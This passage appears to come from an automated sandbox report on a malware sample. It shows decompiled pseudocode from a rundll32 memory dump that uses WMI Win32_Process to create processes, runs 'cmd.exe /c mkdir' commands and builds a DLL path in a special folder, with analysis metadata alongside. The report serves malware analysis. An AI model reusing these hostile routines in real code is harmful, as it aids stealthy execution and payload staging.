                				intOrPtr* _t284;
                				intOrPtr* _t288;
                				void* _t355;
                				long long* _t358;
                				long long* _t360;
                				long long _t362;
                				long long _t364;
                				signed long long _t366;
                				void* _t369;
                				short* _t370;
                				void* _t372;
                				void* _t373;
                				void* _t392;
                				void* _t395;
                				struct HINSTANCE__* _t398;
                				WCHAR* _t402;
                
                				_t279 = __rbx;
                				 *((long long*)(_t372 + 0x10)) = __rdx;
                				_t370 = _t372 - 0x70;
                				_t373 = _t372 - 0x170;
                				 *((long long*)(_t370 + 0x30)) = 0xfffffffe;
                				 *((long long*)(_t373 + 0x1b0)) = __rbx;
                				 *((long long*)(_t373 + 0x58)) = __rbx;
                				 *((long long*)(_t370 + 0xb8)) = __rbx;
                				 *((long long*)(_t373 + 0x20)) = _t373 + 0x58;
                				_t9 = _t279 + 1; // 0x1
                				r8d = _t9;
                				__imp__CoCreateInstance(_t369);
                				if (__eax < 0) goto 0x205cb5c0;
                				 *((long long*)(_t373 + 0x40)) = _t370 + 0xb8;
                				 *((long long*)(_t373 + 0x38)) = __rbx;
                				 *((long long*)(_t373 + 0x30)) = __rbx;
                				 *((intOrPtr*)(_t373 + 0x28)) = 0;
                				 *((long long*)(_t373 + 0x20)) = __rbx;
                				r9d = 0;
                				r8d = 0;
                				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x58)))) + 0x18))() >= 0) goto 0x205cb5c7;
                				_t284 =  *((intOrPtr*)(_t373 + 0x58));
                				if (_t284 == 0) goto 0x205cb5c0;
                				 *((intOrPtr*)( *_t284 + 0x10))();
                				goto 0x205cbb56;
                				_t255 =  *0x20683330; // 0x0
                				if (_t255 != 0) goto 0x205cb5f7;
                				GetModuleHandleW(_t402);
                				GetProcAddress(_t398);
                				 *0x20683330 = _t255;
                				 *((intOrPtr*)(_t373 + 0x38)) = 0;
                				 *((long long*)(_t373 + 0x30)) = __rbx;
                				 *((intOrPtr*)(_t373 + 0x28)) = 3;
                				 *((intOrPtr*)(_t373 + 0x20)) = 3;
                				r9d = 0;
                				r8d = 0;
                				if ( *_t255() >= 0) goto 0x205cb643;
                				_t288 =  *((intOrPtr*)(_t373 + 0x58));
                				if (_t288 == 0) goto 0x205cb637;
                				 *((intOrPtr*)( *_t288 + 0x10))();
                				goto 0x205cb5b5;
                				__imp__#2();
                				__imp__#2();
                				__imp__#2();
                				 *((long long*)(_t373 + 0x70)) = __rbx;
                				 *((long long*)(_t373 + 0x28)) = __rbx;
                				 *((long long*)(_t373 + 0x20)) = _t373 + 0x70;
                				r9d = 0;
                				r8d = 0;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t370 + 0xb8)))) + 0x30))();
                				 *((long long*)(_t373 + 0x78)) = __rbx;
                				 *((long long*)(_t373 + 0x28)) = __rbx;
                				 *((long long*)(_t373 + 0x20)) = _t373 + 0x78;
                				r9d = 0;
                				r8d = 0;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t370 + 0xb8)))) + 0x30))();
                				 *((long long*)(_t373 + 0x68)) = __rbx;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x78)))) + 0x78))();
                				 *((long long*)(_t370 - 0x80)) = __rbx;
                				 *((long long*)(_t373 + 0x20)) = __rbx;
                				r8d = 0;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x70)))) + 0x98))();
                				 *((long long*)(_t373 + 0x50)) = __rbx;
                				_t261 =  *((intOrPtr*)( *((intOrPtr*)(_t370 - 0x80))));
                				 *((intOrPtr*)(_t261 + 0x78))();
                				 *((long long*)(_t370 - 0x58)) = __rbx;
                				 *((long long*)(_t370 - 0x50)) = __rbx;
                				 *((long long*)(_t370 - 0x50)) = 0xf;
                				 *((long long*)(_t370 - 0x58)) = __rbx;
                				 *((char*)(_t370 - 0x68)) = 0;
                				_t367 = _t366 | 0xffffffff;
                				if (__rcx == 0) goto 0x205cb75a;
                				if ( *__rcx != 0) goto 0x205cb741;
                				goto 0x205cb74e;
                				if ( *((char*)(__rcx + (_t366 | 0xffffffff) + 1)) != 0) goto 0x205cb744;
                				E0000021521520588C10(__rbx, _t370 - 0x68, __rcx, __rcx, _t370, (_t366 | 0xffffffff) + 1);
                				__imp__#8();
                				 *((short*)(_t370 - 0x30)) = 8;
                				_t400 =  >=  ?  *((void*)(_t370 - 0x68)) : _t370 - 0x68;
                				E00000215215205F4DCC(_t261, _t370 - 0x30);
                				 *((long long*)(_t370 - 0x78)) = _t261;
                				if (_t261 == 0) goto 0x205cb7a7;
                				 *((long long*)(_t261 + 8)) = _t279;
                				 *((intOrPtr*)(_t261 + 0x10)) = 1;
                				_t300 =  >=  ?  *((void*)(_t370 - 0x68)) : _t370 - 0x68;
                				E00000215215205F6FA0(0, _t279,  >=  ?  *((void*)(_t370 - 0x68)) : _t370 - 0x68, _t366 | 0xffffffff);
                				 *_t261 = _t261;
                				goto 0x205cb7aa;
                				_t358 = _t279;
                				 *((long long*)(_t370 - 0x48)) = _t358;
                				if (_t358 != 0) goto 0x205cb7be;
                				E00000215215205F6F70();
                				_t262 =  *_t358;
                				 *((long long*)(_t370 - 0x28)) = _t262;
                				asm("lock xadd [edi+0x10], eax");
                				if (__esi != 1) goto 0x205cb801;
                				if ( *_t358 == 0) goto 0x205cb7e2;
                				__imp__#6();
                				 *_t358 = _t279;
                				if ( *((intOrPtr*)(_t358 + 8)) == 0) goto 0x205cb7f4;
                				E00000215215205F51EC(_t262, _t279, _t366 | 0xffffffff, _t395);
                				 *((long long*)(_t358 + 8)) = _t279;
                				E00000215215205F51EC(_t262, _t279, _t366 | 0xffffffff, _t392);
                				 *((long long*)(_t370 - 0x48)) = _t279;
                				E00000215215205F4DCC(_t262, _t358);
                				 *((long long*)(_t370 - 0x70)) = _t262;
                				if (_t262 == 0) goto 0x205cb846;
                				 *((long long*)(_t262 + 8)) = _t279;
                				 *((intOrPtr*)(_t262 + 0x10)) = 1;
                				__imp__#2();
                				 *_t262 = _t262;
                				if (_t262 != 0) goto 0x205cb849;
                				E00000215215205F6F70();
                				asm("int3");
                				_t360 = _t279;
                				 *((long long*)(_t370 - 0x40)) = _t360;
                				if (_t360 != 0) goto 0x205cb85d;
                				E00000215215205F6F70();
                				 *((intOrPtr*)(_t373 + 0x20)) = 0;
                				r8d = 0;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x50)))) + 0x28))();
                				asm("lock xadd [edi+0x10], esi");
                				if (__esi != 1) goto 0x205cb8b1;
                				if ( *_t360 == 0) goto 0x205cb892;
                				__imp__#6();
                				 *_t360 = _t279;
                				if ( *((intOrPtr*)(_t360 + 8)) == 0) goto 0x205cb8a4;
                				E00000215215205F51EC( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x50)))), _t279, _t366 | 0xffffffff, _t355);
                				 *((long long*)(_t360 + 8)) = _t279;
                				E00000215215205F51EC( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x50)))), _t279, _t367, _t366);
                				 *((long long*)(_t370 - 0x40)) = _t279;
                				__imp__#8();
                				 *_t370 = 0x13;
                				 *((intOrPtr*)(_t370 + 8)) = 0;
                				 *((intOrPtr*)(_t373 + 0x20)) = 0;
                				r8d = 0;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x68)))) + 0x28))();
                				__imp__#8();
                				 *((short*)(_t370 + 0x18)) = 0x11;
                				 *((char*)(_t370 + 0x20)) = 0;
                				 *((intOrPtr*)(_t373 + 0x20)) = 0;
                				r8d = 0;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x68)))) + 0x28))();
                				__imp__#8();
                				 *((short*)(_t370 - 0x18)) = 0xd;
                				 *((long long*)(_t370 - 0x10)) =  *((intOrPtr*)(_t373 + 0x68));
                				 *((intOrPtr*)(_t373 + 0x20)) = 0;
                				r8d = 0;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x50)))) + 0x28))();
                				 *((long long*)(_t373 + 0x60)) = _t279;
                				 *((long long*)(_t373 + 0x38)) = _t279;
                				 *((long long*)(_t373 + 0x30)) = _t373 + 0x60;
                				_t269 =  *((intOrPtr*)(_t373 + 0x50));
                				 *((long long*)(_t373 + 0x28)) = _t269;
                				 *((long long*)(_t373 + 0x20)) = _t279;
                				r9d = 0;
                				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t370 + 0xb8)))) + 0xc0))() >= 0) goto 0x205cb99f;
                				goto 0x205cbabd;
                				E00000215215205F4DCC(_t269, _t370 - 0x30);
                				 *((long long*)(_t370 - 0x70)) = _t269;
                				if (_t269 == 0) goto 0x205cb9e0;
                				 *((long long*)(_t269 + 8)) = _t279;
                				 *((intOrPtr*)(_t269 + 0x10)) = 1;
                				__imp__#2();
                				 *_t269 = _t269;
                				if (_t269 != 0) goto 0x205cb9e3;
                				E00000215215205F6F70();
                				asm("int3");
                				_t362 = _t279;
                				 *((long long*)(_t370 - 0x38)) = _t362;
                				if (_t362 != 0) goto 0x205cb9f7;
                				E00000215215205F6F70();
                				_t270 =  *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x60))));
                				 *((long long*)(_t373 + 0x28)) = _t279;
                				 *((long long*)(_t373 + 0x20)) = _t279;
                				r8d = 0;
                				E00000215215205C51F0( *((intOrPtr*)(_t270 + 0x20))(), _t279, _t370 - 0x38);
                				E00000215215205F4DCC(_t270, _t370 - 0x38);
                				 *((long long*)(_t370 - 0x70)) = _t270;
                				if (_t270 == 0) goto 0x205cba61;
                				 *((long long*)(_t270 + 8)) = _t279;
                				 *((intOrPtr*)(_t270 + 0x10)) = 1;
                				__imp__#2();
                				 *_t270 = _t270;
                				if (_t270 != 0) goto 0x205cba64;
                				E00000215215205F6F70();
                				asm("int3");
                				_t364 = _t279;
                				 *((long long*)(_t370 - 0x78)) = _t364;
                				if (_t364 != 0) goto 0x205cba78;
                				E00000215215205F6F70();
                				 *((long long*)(_t373 + 0x28)) = _t279;
                				 *((long long*)(_t373 + 0x20)) = _t279;
                				r8d = 0;
                				E00000215215205C51F0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x60)))) + 0x20))(), _t279, _t370 - 0x78);
                				__imp__#9();
                				__imp__#9();
                				__imp__#9();
                				__imp__#9();
                				__imp__#9();
                				__imp__#9();
                				__imp__#6();
                				__imp__#6();
                				__imp__#6();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x70)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x78)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x50)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t370 - 0x80)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x60)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t370 + 0xb8)))) + 0x10))();
                				E0000021521520586820( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x58)))) + 0x10))(), 0x8007000e, _t370 - 0x68);
                				return  *((short*)(_t370 + 0x40));
                			}

                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Similarity
                • API ID: String$Variant$_com_issue_error$AllocClear$Free$Init$AddressConvertCreateHandleInstanceModuleProc_com_util::
                • String ID: CoSetProxyBlanket$CommandLine$Create$CreateFlags$ProcessId$ProcessStartupInformation$ROOT\CIMV2$ReturnValue$ShowWindow$Win32_Process$Win32_ProcessStartup$ole32.dll
                • API String ID: 3900671881-2140978212
                • Opcode ID: 577be674044115fc2f78a0cf5240f538573a94ace5507aee088b599f99c6a764
                • Instruction ID: de2445feda598677191f082db2757ba059f89a862263e365d350031ebb43f050
                • Opcode Fuzzy Hash: 577be674044115fc2f78a0cf5240f538573a94ace5507aee088b599f99c6a764
                • Instruction Fuzzy Hash: 60122337202F60C6EB208F65E89869D77B0FB98BA8F544565DE4E47B68DF38C558C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E00000215215205CC180(void* __eax, void* __esi, long long __rcx, long long __rdx) {
                				void* __rbx;
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				long long* _t227;
                				long long* _t234;
                				long long* _t235;
                				long long _t245;
                				intOrPtr* _t250;
                				intOrPtr* _t252;
                				void* _t308;
                				intOrPtr* _t310;
                				long long _t312;
                				long long _t314;
                				signed long long _t316;
                				void* _t319;
                				short* _t320;
                				void* _t322;
                				void* _t323;
                				void* _t341;
                				void* _t344;
                				void* _t347;
                				void* _t351;
                
                				 *((long long*)(_t322 + 0x10)) = __rdx;
                				 *((long long*)(_t322 + 8)) = __rcx;
                				_t320 = _t322 - 0x38;
                				_t323 = _t322 - 0x138;
                				 *((long long*)(_t320 - 0x10)) = 0xfffffffe;
                				 *((long long*)(_t320 + 0x98)) = _t245;
                				 *((long long*)(_t320 + 0x80)) = _t245;
                				 *((long long*)(_t323 + 0x20)) = _t320 + 0x98;
                				_t9 = _t245 + 1; // 0x1
                				r8d = _t9;
                				__imp__CoCreateInstance(_t344, _t341, _t308, _t316, _t245, _t319);
                				if (__eax < 0) goto 0x205cc233;
                				 *((long long*)(_t323 + 0x40)) = _t320 + 0x80;
                				 *((long long*)(_t323 + 0x38)) = _t245;
                				 *((long long*)(_t323 + 0x30)) = _t245;
                				 *((intOrPtr*)(_t323 + 0x28)) = 0;
                				 *((long long*)(_t323 + 0x20)) = _t245;
                				r9d = 0;
                				r8d = 0;
                				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x98)))) + 0x18))() >= 0) goto 0x205cc23a;
                				_t250 =  *((intOrPtr*)(_t320 + 0x98));
                				if (_t250 == 0) goto 0x205cc233;
                				 *((intOrPtr*)( *_t250 + 0x10))();
                				goto 0x205cc6df;
                				 *((intOrPtr*)(_t323 + 0x38)) = 0;
                				 *((long long*)(_t323 + 0x30)) = _t245;
                				 *((intOrPtr*)(_t323 + 0x28)) = 3;
                				 *((intOrPtr*)(_t323 + 0x20)) = 3;
                				r9d = 0;
                				r8d = 0;
                				__imp__CoSetProxyBlanket();
                				if (3 >= 0) goto 0x205cc285;
                				_t252 =  *((intOrPtr*)(_t320 + 0x98));
                				if (_t252 == 0) goto 0x205cc27c;
                				 *((intOrPtr*)( *_t252 + 0x10))();
                				goto 0x205cc228;
                				__imp__#2();
                				__imp__#2();
                				__imp__#2();
                				 *((long long*)(_t323 + 0x60)) = _t245;
                				 *((long long*)(_t323 + 0x28)) = _t245;
                				 *((long long*)(_t323 + 0x20)) = _t323 + 0x60;
                				r9d = 0;
                				r8d = 0;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x80)))) + 0x30))();
                				 *((long long*)(_t323 + 0x68)) = _t245;
                				 *((long long*)(_t323 + 0x28)) = _t245;
                				 *((long long*)(_t323 + 0x20)) = _t323 + 0x68;
                				r9d = 0;
                				r8d = 0;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x80)))) + 0x30))();
                				 *((long long*)(_t323 + 0x50)) = _t245;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x68)))) + 0x78))();
                				 *((long long*)(_t323 + 0x70)) = _t245;
                				 *((long long*)(_t323 + 0x20)) = _t245;
                				r8d = 0;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x60)))) + 0x98))();
                				 *((long long*)(_t320 + 0x90)) = _t245;
                				_t227 =  *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x70))));
                				 *((intOrPtr*)(_t227 + 0x78))();
                				 *((long long*)(_t320 - 0x78)) = _t245;
                				 *((long long*)(_t320 - 0x70)) = _t245;
                				 *((long long*)(_t320 - 0x70)) = 0xf;
                				 *((long long*)(_t320 - 0x78)) = _t245;
                				 *((char*)(_t323 + 0x78)) = 0;
                				if ( *0x206830b0 != 0) goto 0x205cc391;
                				goto 0x205cc39e;
                				if ( *((char*)(0x206830b0 + (_t316 | 0xffffffff) + 1)) != 0) goto 0x205cc394;
                				E0000021521520588C10(_t245, _t323 + 0x78, 0x206830b0, _t308, _t320, (_t316 | 0xffffffff) + 1);
                				 *((short*)(_t320 - 0x58)) = 8;
                				_t349 =  >=  ?  *((void*)(_t323 + 0x78)) : _t323 + 0x78;
                				E00000215215205F4DCC(_t227, _t323 + 0x78);
                				 *((long long*)(_t320 + 0x88)) = _t227;
                				if (_t227 == 0) goto 0x205cc3f0;
                				 *((long long*)(_t227 + 8)) = _t245;
                				 *((intOrPtr*)(_t227 + 0x10)) = 1;
                				_t263 =  >=  ?  *((void*)(_t323 + 0x78)) : _t323 + 0x78;
                				E00000215215205F6FA0(0, _t245,  >=  ?  *((void*)(_t323 + 0x78)) : _t323 + 0x78, _t316 | 0xffffffff);
                				 *_t227 = _t227;
                				goto 0x205cc3f3;
                				_t310 = _t245;
                				 *((long long*)(_t320 + 0x88)) = _t310;
                				if (_t310 != 0) goto 0x205cc40a;
                				E00000215215205F6F70();
                				 *((long long*)(_t320 - 0x50)) =  *_t310;
                				asm("lock xadd [edi+0x10], esi");
                				if (__esi != 1) goto 0x205cc44b;
                				if ( *_t310 == 0) goto 0x205cc42c;
                				__imp__#6();
                				 *_t310 = _t245;
                				if ( *((intOrPtr*)(_t310 + 8)) == 0) goto 0x205cc43e;
                				E00000215215205F51EC( *_t310, _t245, _t316 | 0xffffffff, _t351);
                				 *((long long*)(_t310 + 8)) = _t245;
                				E00000215215205F51EC( *_t310, _t245, _t316 | 0xffffffff, _t347);
                				 *((long long*)(_t320 + 0x88)) = _t245;
                				 *((intOrPtr*)(_t323 + 0x20)) = 0;
                				r8d = 0;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x90)))) + 0x28))();
                				 *((short*)(_t320 - 0x28)) = 3;
                				 *((intOrPtr*)(_t320 - 0x20)) = 4;
                				 *((intOrPtr*)(_t323 + 0x20)) = 0;
                				r8d = 0;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x50)))) + 0x28))();
                				 *((short*)(_t320 - 0x40)) = 0xd;
                				 *((long long*)(_t320 - 0x38)) =  *((intOrPtr*)(_t323 + 0x50));
                				 *((intOrPtr*)(_t323 + 0x20)) = 0;
                				r8d = 0;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x90)))) + 0x28))();
                				 *((long long*)(_t323 + 0x58)) = _t245;
                				 *((long long*)(_t323 + 0x38)) = _t245;
                				 *((long long*)(_t323 + 0x30)) = _t323 + 0x58;
                				_t234 =  *((intOrPtr*)(_t320 + 0x90));
                				 *((long long*)(_t323 + 0x28)) = _t234;
                				 *((long long*)(_t323 + 0x20)) = _t245;
                				r9d = 0;
                				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x80)))) + 0xc0))() >= 0) goto 0x205cc52f;
                				__imp__#9();
                				__imp__#9();
                				goto 0x205cc653;
                				E00000215215205F4DCC(_t234, _t320 - 0x28);
                				 *((long long*)(_t320 + 0x88)) = _t234;
                				if (_t234 == 0) goto 0x205cc573;
                				 *((long long*)(_t234 + 8)) = _t245;
                				 *((intOrPtr*)(_t234 + 0x10)) = 1;
                				__imp__#2();
                				 *_t234 = _t234;
                				if (_t234 != 0) goto 0x205cc576;
                				E00000215215205F6F70();
                				asm("int3");
                				_t312 = _t245;
                				 *((long long*)(_t320 - 0x68)) = _t312;
                				if (_t312 != 0) goto 0x205cc58a;
                				E00000215215205F6F70();
                				_t235 =  *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x58))));
                				 *((long long*)(_t323 + 0x28)) = _t245;
                				 *((long long*)(_t323 + 0x20)) = _t245;
                				r8d = 0;
                				E00000215215205C51F0( *((intOrPtr*)(_t235 + 0x20))(), _t245, _t320 - 0x68);
                				E00000215215205F4DCC(_t235, _t320 - 0x68);
                				 *((long long*)(_t320 + 0x88)) = _t235;
                				if (_t235 == 0) goto 0x205cc5f7;
                				 *((long long*)(_t235 + 8)) = _t245;
                				 *((intOrPtr*)(_t235 + 0x10)) = 1;
                				__imp__#2();
                				 *_t235 = _t235;
                				if (_t235 != 0) goto 0x205cc5fa;
                				E00000215215205F6F70();
                				asm("int3");
                				_t314 = _t245;
                				 *((long long*)(_t320 - 0x60)) = _t314;
                				if (_t314 != 0) goto 0x205cc60e;
                				E00000215215205F6F70();
                				 *((long long*)(_t323 + 0x28)) = _t245;
                				 *((long long*)(_t323 + 0x20)) = _t245;
                				r8d = 0;
                				E00000215215205C51F0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x58)))) + 0x20))(), _t245, _t320 - 0x60);
                				__imp__#9();
                				__imp__#9();
                				__imp__#9();
                				__imp__#6();
                				__imp__#6();
                				__imp__#6();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x60)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x68)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x50)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x90)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x70)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x58)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x80)))) + 0x10))();
                				E0000021521520586820( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x98)))) + 0x10))(), 0x8007000e, _t323 + 0x78);
                				return  *_t320;
                			}

                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Similarity
                • API ID: String$AllocClearVariant_com_issue_error$Free$BlanketConvertCreateInstanceProxy_com_util::
                • String ID: CommandLine$Create$CreateFlags$ProcessId$ProcessStartupInformation$ROOT\CIMV2$ReturnValue$Win32_Process$Win32_ProcessStartup
                • API String ID: 3916112548-2022159726
                • Opcode ID: 5a087bbaaa817a8b4bb644c11bc11c303b2db18c28a5b500b6b8c2941372f159
                • Instruction ID: 93204e2633125873ee2d3148e9cab823a9c718d21d5b253ef7fcf29073fe3d17
                • Opcode Fuzzy Hash: 5a087bbaaa817a8b4bb644c11bc11c303b2db18c28a5b500b6b8c2941372f159
                • Instruction Fuzzy Hash: F6F11737206F90C6EB208F65E89879D77A0FB98BA8F544565DE8D87B68DF38C548C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 26%
                			E0000021521520587ED0(signed char __ebx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, signed long long __r9, signed int __r12) {
                				void* __rbp;
                				void* __r14;
                				void* __r15;
                				void* _t179;
                				signed char _t184;
                				void* _t188;
                				void* _t189;
                				void* _t203;
                				void* _t219;
                				void* _t221;
                				void* _t222;
                				int _t228;
                				signed char _t237;
                				signed char _t241;
                				signed char _t250;
                				void* _t252;
                				void* _t254;
                				void* _t298;
                				intOrPtr _t299;
                				intOrPtr _t301;
                				intOrPtr* _t302;
                				intOrPtr* _t304;
                				intOrPtr* _t305;
                				intOrPtr _t306;
                				intOrPtr _t307;
                				intOrPtr _t309;
                				intOrPtr _t312;
                				char* _t314;
                				void* _t315;
                				intOrPtr _t323;
                				void* _t324;
                				void* _t328;
                				signed int _t372;
                				intOrPtr _t381;
                				void* _t382;
                				void* _t425;
                				void* _t430;
                				void* _t432;
                				void* _t433;
                				void* _t434;
                				signed long long _t458;
                				signed long long _t459;
                				signed long long _t460;
                				void* _t469;
                				signed int _t471;
                				void* _t473;
                				signed long long _t474;
                				void* _t475;
                
                				_t471 = __r12;
                				_t458 = __r9;
                				_t237 = __ebx;
                				_t298 = _t433;
                				_t432 = _t298 - 0x4d8;
                				_t434 = _t433 - 0x5c0;
                				 *((long long*)(_t432 + 0xa8)) = 0xfffffffe;
                				 *((long long*)(_t298 + 8)) = __rbx;
                				 *((long long*)(_t298 + 0x10)) = __rsi;
                				 *((long long*)(_t298 + 0x18)) = __rdi;
                				 *((long long*)(_t298 + 0x20)) = __r12;
                				_t474 = __r9;
                				_t425 = __r8;
                				_t475 = __rdx;
                				_t430 = __rcx;
                				asm("xorps xmm0, xmm0");
                				asm("movdqu [ebp+0x30], xmm0");
                				r12d = 0;
                				 *(_t432 + 0x40) = __r12;
                				 *((intOrPtr*)(_t434 + 0x40)) = r12b;
                				_t179 = E0000021521520588660(__rbx, _t432 + 0x30, _t434 + 0x40);
                				r9d = 0;
                				_t11 = _t471 + 0x23; // 0x23
                				r8d = _t11;
                				_t314 =  *((intOrPtr*)(_t432 + 0x30));
                				__imp__SHGetSpecialFolderPathA();
                				if (_t179 != 0) goto 0x20587f52;
                				goto 0x205885cf;
                				 *(_t434 + 0x78) = __r12;
                				 *((long long*)(_t432 - 0x80)) = __r12;
                				 *((long long*)(_t432 - 0x80)) = 0xf;
                				 *(_t434 + 0x78) = __r12;
                				 *((char*)(_t434 + 0x68)) = 0;
                				if ( *_t314 != 0) goto 0x20587f77;
                				goto 0x20587f8a;
                				if ( *((char*)(_t314 + (__r12 | 0xffffffff) + 1)) != 0) goto 0x20587f80;
                				E0000021521520586B10(_t314, _t434 + 0x68, _t314, __rcx, (__r12 | 0xffffffff) + 1);
                				if ( *(_t434 + 0x78) != 0) goto 0x20587faa;
                				goto 0x20588566;
                				E00000215215205893D0(_t314, _t434 + 0x48, "\\", _t430, _t432, _t430, _t458);
                				_t459 = _t458 | 0xffffffff;
                				r8d = r8d ^ r8d;
                				E0000021521520588D60(_t314, _t434 + 0x68, _t298, _t425, _t430, _t432, _t430, _t459);
                				_t299 =  *((intOrPtr*)(_t434 + 0x60));
                				if (_t299 - 0x10 < 0) goto 0x2058802c;
                				_t323 =  *((intOrPtr*)(_t434 + 0x48));
                				if (_t299 + 1 - 0x1000 < 0) goto 0x20588027;
                				if (0 == 0) goto 0x20587ffa;
                				0x205faadc();
                				asm("int3");
                				_t301 =  *((intOrPtr*)(_t323 - 8));
                				if (_t301 - _t323 < 0) goto 0x20588009;
                				0x205faadc();
                				asm("int3");
                				_t324 = _t323 - _t301;
                				if (_t324 - 8 >= 0) goto 0x20588018;
                				0x205faadc();
                				asm("int3");
                				if (_t324 - 0x27 <= 0) goto 0x20588024;
                				0x205faadc();
                				asm("int3");
                				0x205f51e4();
                				 *((long long*)(_t434 + 0x60)) = 0xf;
                				 *((long long*)(_t434 + 0x58)) = __r12;
                				 *((char*)(_t434 + 0x48)) = 0;
                				_t302 = _t434 + 0x68;
                				if (_t425 == _t302) goto 0x2058805d;
                				_t460 = _t459 | 0xffffffff;
                				r8d = 0;
                				E0000021521520586C40(_t314, _t425, _t434 + 0x68, _t425, _t430, _t430, _t460);
                				if ( *((char*)(_t432 + 0x500)) == 0) goto 0x20588070;
                				goto 0x20588566;
                				_t328 =  >=  ?  *((void*)(_t434 + 0x68)) : _t434 + 0x68;
                				_t184 = GetFileAttributesA(??);
                				if (_t184 == 0xffffffff) goto 0x20588097;
                				if ((_t184 & 0x00000010) == 0) goto 0x20588097;
                				goto 0x20588566;
                				 *((long long*)(_t432 + 0x20)) = __r12;
                				 *((long long*)(_t432 + 0x28)) = __r12;
                				 *((long long*)(_t432 + 0x28)) = 0xf;
                				 *((long long*)(_t432 + 0x20)) = __r12;
                				 *((char*)(_t432 + 0x10)) = 0;
                				r8d = 7;
                				E0000021521520586B10(_t314, _t432 + 0x10, "\"mkdir ", _t430, _t430);
                				_t461 = _t460 | 0xffffffff;
                				r8d = r8d ^ r8d;
                				E0000021521520588D60(_t314, _t432 + 0x10, _t425, _t425, _t430, _t432, _t430, _t460 | 0xffffffff);
                				r8d = 1;
                				E0000021521520588C10(_t314, _t432 + 0x10, "\"", _t425, _t432, _t430);
                				_t188 = E00000215215205893D0(_t314, _t434 + 0x48, "cmd.exe /c ", _t430, _t432, _t432 + 0x10, _t460 | 0xffffffff);
                				if ( *((long long*)(_t302 + 0x18)) - 0x10 < 0) goto 0x20588111;
                				_t189 = E00000215215205CB510(_t188, _t252, _t314,  *_t302, "cmd.exe /c ");
                				E0000021521520586820(_t189, 0, _t434 + 0x48);
                				if (_t189 == 0) goto 0x20588130;
                				0x20587e80();
                				E0000021521520589490(_t314, _t434 + 0x48, _t434 + 0x68, _t430, _t432, "\\", _t461);
                				E0000021521520586820(E00000215215205895D0(_t432 + 0x88,  *_t302, _t425, _t430, _t432, _t475, _t461), _t189, _t434 + 0x48);
                				r8d = 4;
                				E0000021521520588C10(_t314, _t432 + 0x88, ".dll", _t425, _t432, _t475);
                				 *((long long*)(_t432 + 0x58)) = __r12;
                				 *((long long*)(_t432 + 0x60)) = __r12;
                				 *((long long*)(_t432 + 0x60)) = 0xf;
                				 *((long long*)(_t432 + 0x58)) = __r12;
